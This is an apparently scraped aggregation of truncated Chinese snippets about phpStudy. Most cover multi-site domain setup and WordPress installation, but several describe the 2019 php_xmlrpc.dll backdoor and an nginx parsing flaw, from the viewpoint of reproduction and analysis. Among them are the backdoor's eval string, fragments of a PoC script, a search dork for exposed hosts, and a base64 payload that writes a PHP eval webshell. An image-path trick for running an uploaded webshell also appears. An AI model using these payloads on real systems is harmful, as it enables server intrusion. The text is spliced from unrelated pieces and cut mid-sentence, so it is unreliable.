站长前面推荐过《phpStudy:非常棒的PHP环境搭建包(支持Apache、IIS、Nginx和LightTPD) 》,今天来简单介绍一下使用 phpStudy 创建多个站点,绑定域名的方法。...默认情况下,phpStudy 的站点根目录是在它自己的WWW目录,比如 F:\phpStudy\WWW,访问的地址可以是 http://127.0.0.1/ 或 http://localhost/...注:本文解说的是 phpStudy 完整版的,其他版本可能行不通或不一样。...1.打开 phpStudy ,在“其他选项”那里点击“站点域名设置” 2.看到如下界面,填写网站域名(随意写,建议不要写你经常访问的线上域名),然后选择网站目录(可以随意目录,但是不要使用中文),然后点击...【新增】,然后点击【保存设置并生成配置文件】,重启环境就可以生效了 3.上面我们填写的域名,我们希望是直接访问我们本地的网站,要实现这个目的,我们需要修改一下自己电脑里的 hosts 文件,将域名指定到
本文介绍了phpStudy配置多站点多域名和多端口的方法,分享给大家,也给自己留个笔记 WWW目录下有三个项目目录: a b c Apache 默认httpd端口为 80,网站目录为D:WWWa...1.配置多域名多站点 第一步:点击“其他选项菜单”=>站点域名管理=>设置如下三个站点域名: (1)网站域名:a.com 网站目录:D:WWWa 网站端口:80 (2)网站域名:b.com 网站目录...:D:WWWb 网站端口:80 (3)网站域名:c.com 网站目录:D:WWWc 网站端口:80 保存配置并生成配置文件; 第二步:打开hosts.txt文件,在文件末尾加上如下内容: 127.0.0.1...80 2.配置多端口 第一步设置改为: (1)网站域名:a.com 网站目录:D:WWWa 网站端口:80 (2)网站域名:b.com 网站目录:D:WWWb 网站端口:81 (3)网站域名:c.com...,打开vhosts.conf配置文件,查看是否有如下内容: DocumentRoot "D:WWWa" ServerName a.com ServerAlias phpStudy.NET
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:...对美国受影响的目标进行简单的探查发现基本都是属于IDC机房的机器,猜测都是国人在购买的vps上搭建的PhpStudy。...知道创宇云防御数据 知道创宇404积极防御团队检测到2019/09/24开始,互联网上有人开始对PhpStudy后门中的RCE进行利用。
使用站点管理器来创建虚拟主机概括地说便是下列两个步骤: 新建一个网站项目(文件夹),在站点域名管理界面中,再新建一个域名 同这个新建的网站项目进行绑定; 修改host文件,将新建的域名同本地主机的ip进行绑定...站点域名管理的进入 点击右下角两个按钮弹出的菜单中,都有“站点域名管理”这个菜单项可以进入: ? ? 站点域名管理界面: ?...站点域名管理的实操 点击“其他选项菜单”,打开My HomePage: ?...实际上就是将一个域名和一个本地的网站目录进行绑定, 实现模拟出一个跟现场完全相同的环境; 站点域名管理 其实 又称 虚拟主机管理; 将一个域名和一个本地的网站目录进行绑定,这样子可以用本地模拟成服务器...,在本地这台主机上搭建很多网站; 下面开始具体的实操: 打开PHPstudy,点击其它选项菜单,点击网站根目录, ?
复现环境 phpstudy2016 +win10 复现过程 启动有漏洞的phpstudy pcat的检测脚本如下 python版本: # -*- coding:utf8 -*- __author__='...dirs: pcheck(os.path.join(path, name)) pass if __name__ == '__main__': foo() 放在phpstudy...5.4.45\ext\php_xmlrpc.dll === @eval(%s('%s')); %s;@eval(%s('%s')); [Finished in 10.2s] 可以发现 主要是这两个版本的phpstudy...Administrator" or "DefaultAccount" in r.text: # # print(r.text) # else: # print("不存在phpstudy...后门") # if len(sys.argv) < 2: # print("python phpstudy.py http://127.0.0.1") # else: # Poc(sys.argv
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:...ZoomEye数据 通过ZoomEye探测phpstudy可以使用以下dork: 1."...对美国受影响的目标进行简单的探查发现基本都是属于IDC机房的机器,猜测都是国人在购买的vps上搭建的PhpStudy。 4.
此文不太适合一点不懂多站点多域名的。适合于碰到难处了,一点就透。ok。比较随意。 首先,打开站点域名管理,配置如下,网站域名和目录都可以自己设置,端口重设一个,不要是80了,然后先新增再保存。...域名配好了。。此时又有问题了 浏览器出这样的页面但是当你输入www.test.com/index.php时就可以访问index.php的程序需要写完整路径。。。。怎么破。。。...这个问题就解决了(有时不需要注释掉,按自己的情况来)好像是静态网站需要注释,动态网站不要注释 再添一句自己的 访问的时候带上端口 如:http://www.aaa.com:801/ 以上所述是小编给大家介绍的phpStudy...配置多站点多域名方法及遇到的403错误解决方法,希望对大家有所帮助,
注册域名之后就涉及到域名解析、域名加速、域名NS记录等等很多操作,接触的新手越多,魏艾斯博客越是觉得要普及一下域名注册和域名管理之间的联系和区别。...2、域名管理权 注册完后域名管理权在namesilo了,这里说的域名管理权也就是域名NS记录,也叫NameServer、域名NS、NS管理,下面截图有三条地址,一般使用两条就够了。...域名管理权操作也就是域名解析,也就是添加修改删除A记录、Cname记录、MX记录等等。 ? 举例说需要转移域名管理权到siteground。...也就是说你把NS记录放到谁家,域名管理权就在谁那里。和你在哪里注册付费购买域名是无关的,不发生关系的。你可以在A家买域名,B家管理域名解析。...提示:注意有的主机商提供了域名管理功能,比如国内的阿里云、腾讯云,国外的Siteground(使用的cpanel是国内外普及率极高的一款主机管理面板,自带域名管理功能)、Linode、Bluehost等
0x01:前言 近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门...0x02:预防 phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll...影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45...更多漏洞细节参考文章:PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版...:点击下载 提取码:nlnq 靶机环境搭建成功后,即可访问phpinfo页面 0x03 漏洞检测 phpStudy的后门问题代码存在于以下路径文件中 # phpStudy2016路径 php\php...ZnB1dHMoZm9wZW4oJ0M6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk7ID8+Jyk7 写入成功后即可用webshell管理工具进行连接
---- 下载和安装 先wget下载 wget -c http://lamp.phpstudy.net/phpstudy.bin 再给对应的权限(自己服务器,暂时自己用,所以暂时744权限) chmod...744 phpstudy.bin (文档上是 chmod +x phpstudy.bin, 自己简单操作) 最后安装 ..../phpstudy.bin 安装的时候,需要选择php版本,以及 服务器类型 ? 自己简单选取 5, a 后 (也就是 5.5, apache) 就自动进行安装了 ?.../phpstudy.bin 但是你会发现有一行是否安装mysql提示 选不安装 这样只需要编译nginx+php5.4 【phpstudy还是蒲老师很早介绍的, 应该有快2年了,感谢:)】 ---...卸载phpstudy的方法 ? 重启 ? vhost添加 ? vhost删除 ?
问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45...环境准备 本次使用的是之前下载安装在本地的phpStudy20180211官网版本 官网下载地址 phpStudy 2018版本下载及更新日志 - phpStudy交流社区 https://www.xp.cn
作者:lu4nx@知道创宇404积极防御实验室 作者博客:《使用 Ghidra 分析 phpStudy 后门》 原文链接:https://paper.seebug.org/1058/ 这次事件已过去数日...1 工具和平台 主要工具: Kali Linux Ghidra 9.0.4 010Editor 9.0.2 样本环境: Windows7 phpStudy 20180211 2 分析过程 先在 Windows...7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。.../PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll 单独拷贝出来,再确认下是否存在后门: lu4nx@lx-kali:/tmp/phpStudy$ strings...《phpStudy 遭黑客入侵植入后门事件披露 | 微步在线报告》 《PhpStudy 后门分析》,作者:Hcamael@知道创宇 404 实验室
简单来说是这样的,你要先注册一个企业,然后绑定微信,你就成为了这个管理员。接着绑定域名,给不同的人新建账户,填入信息,绑定微信,生成域名邮箱。...而且万一我要换个域名呢?只有6次机会。如果要新建一个前缀呢?似乎也不是很自由。 宝塔邮局管理器 这次宝塔面板上的邮局管理器真的是深得我意。安装非常的简单,支持多个域名,也没有用户上的限制。...https://cdntc.xhhdd.cc/2021/06/22/16242907020566.png) 首先自然是左上角的添加域名,不过只支持一级域名。...所以如果网站挂了CDN的就要注意了,要不就是换dns的服务商,像cf就支持根域名的cname跟mx同时存在。要不就是主站用www的二级域名,根域名做一个显性跳转也行。...添加域名之后,就会进行一个自动的配置,然后需要添加MX记录跟其他的TXT记录。 检测通过之后就可以在用户管理这里添加用户使用了。
一,下载最新版本phpStudy一键安装包(下载地址在文末,如果需要运行PHP 7环境,则还需要安装VC运行库) 二、安装phpStudy程序 将下载的phpStudy程序解压到某个分区的根目录中(请不要放在中文目录中...三,新建一个数据库 在浏览器址栏中输入:http://localhost/phpmyadmin/ (或者点击phpStudy面板上的“MySQL管理器”中的phpmyadmin) 进入数据库管理工具登录页面...,用户名及密码默认都是:root 进入数据库管理工具页面后,点击左上角的数据库,在新建数据库中输入:wp(名称可任意),整理选择:utf8_general_ci,如图: 四,下载安装最新WordPress...3、再点击MySQL-站点域名管理,打开站点域名管理器 域名:127.0.0.1(用于网上访问时需要填你的实际域名) 网站目录:X:\phpStudy\WWW\web\WordPress 第二域名和端口可以不填...点新增-保存设置并生成配置文件 这样就将X:\phpStudy\WWW\web\WordPress目录绑定给了127.0.0.1的域名 4、在浏览器中输入:http://127.0.0.1,会看到wordpress
打开站点域名管理 填写站点管理内容,然后点击新增,左侧会增加更才填写的内容,然后点击保存设置并生产配置文件 修改hosts本地映射 Paste_Image.png
0x01 漏洞简介 自从2019年phpStudy爆出后门事件后,2020年9月再次爆出存在nginx解析漏洞。该漏洞是phpStudy默认使用的nginx版本是Nginx1.15.11。...影响版本: phpStudy <= 8.1.0.7 (Windows版) 0x02 漏洞原因 1、由于用户的错误配置导致 nginx 把以 .php 结尾的文件交给 fastcgi 处理,为此可以构造...0x03 环境准备 本次复现环境采用Windows版的phpstudy v8.1.0.1 phpstudy v8.1.0.1 点击下载 提取码:y6qt 安装成功后一键启动WNMP即可 0x04 漏洞复现...192.168.126.129/3.jpg 构造解析后缀访问如下: http://192.168.126.129/3.jpg/xxx.php 在图片马中写入shell,以冰蝎码为例 然后使用冰蝎管理工具进行连接即可...0x05 修复建议 建议升级phpStudy至最新版本。
一个域名多解析,服务器再配置一个站。那还需要花钱了。...但是如果你是新手我教你个最基本的方案150块钱搞定一个站 域名一般正常的.com 58块钱,购买域名 服务器腾讯云最近在做活动 超便宜99块钱一年。...三,新建一个数据库 在浏览器址栏中输入:http://localhost/phpmyadmin/ (或者点击phpStudy面板上的“MySQL管理器”中的phpmyadmin) 进入数据库管理工具登录页面...3、再点击MySQL-站点域名管理,打开站点域名管理器 域名:127.0.0.1(用于网上访问时需要填你的实际域名) 网站目录:X:\phpStudy\WWW\web\WordPress 第二域名和端口可以不填...点新增-保存设置并生成配置文件 这样就将X:\phpStudy\WWW\web\WordPress目录绑定给了127.0.0.1的域名 4、在浏览器中输入:http://127.0.0.1,会看到wordpress
1.在Xshell里面输入wget -c http://lamp.phpstudy.net/phpstudy.bin 回车 2.输入chmod +x phpstudy.bin 回车 ,这一步用于设置权限...6.访问数据库管理地址(phpmyadmin)是:ip/phpmyadmin,默认用户root,密码root,登录进去可以修改 7.域名绑定: 输入:phpstudy add 再输入你的域名就可以了 ?...8.安装ftp: wget -c http://lamp.phpstudy.net/phpstudy-ftpd.sh 回车 chmod +x phpstudy-ftpd.sh 回车 ....至此,所有web环境安装步骤已经安装完毕,把网站文件上传到phpstudy文件下的www目录下,再登录phpmyadmin新建个数据库导入数据,修改下网站配置文件,就可以通过你的域名访问你的网站了。...phpstudy程序使用说明: 服务进程管理:phpstudy (start|stop|restart|uninstall) 站点主机管理:phpstudy (add|del|list) ftpd用户管理
简单来说是这样的,你要先注册一个企业,然后绑定微信,你就成为了这个管理员。接着绑定域名,给不同的人新建账户,填入信息,绑定微信,生成域名邮箱。...而且万一我要换个域名呢?只有6次机会。如果要新建一个前缀呢?似乎也不是很自由。宝塔邮局管理器这次宝塔面板上的邮局管理器真的是深得我意。安装非常的简单,支持多个域名,也没有用户上的限制。...图片https://cdntc.xhhdd.cc/2021/06/22/16242907020566.png)首先自然是左上角的添加域名,不过只支持一级域名。...所以如果网站挂了CDN的就要注意了,要不就是换dns的服务商,像cf就支持根域名的cname跟mx同时存在。要不就是主站用www的二级域名,根域名做一个显性跳转也行。...图片添加域名之后,就会进行一个自动的配置,然后需要添加MX记录跟其他的TXT记录。图片检测通过之后就可以在用户管理这里添加用户使用了。
领取专属 10元无门槛券
手把手带您无忧上云